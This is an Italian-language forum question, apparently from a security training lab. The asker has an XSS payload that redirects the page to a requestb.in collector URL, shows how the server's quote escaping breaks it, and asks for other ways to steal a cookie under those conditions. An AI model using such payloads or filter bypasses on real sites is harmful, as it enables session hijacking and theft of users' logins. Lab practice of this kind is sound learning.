Sto cercando di rubare un cookie usando XSS in un laboratorio di formazione. Il problema è che il server sfugge alle mie quotazioni e alle doppie virgolette. Quindi se voglio usare questo payload per esempio:
<script>document.location="http://requestb.in/XXXXXXX"</script>
Nessuna richiesta GET viene eseguita su " link " a causa del fatto che '
e "
vengono scappati. ( '
diventa \'
e "
diventa '+String.fromCharCode(34)
), quindi il carico utile diventa:
<script>document.location=\'http://requestb.in/XXXXXXX"=\'</script>
OR
<script>document.location='+String.fromCharCode(34)+'http://requestb.in/XXXXXXX'+String.fromCharCode(34)+'</script>
Quindi, quale altro mezzo può essere utilizzato per eseguire un Cookie Stealing in quelle condizioni?
Saluti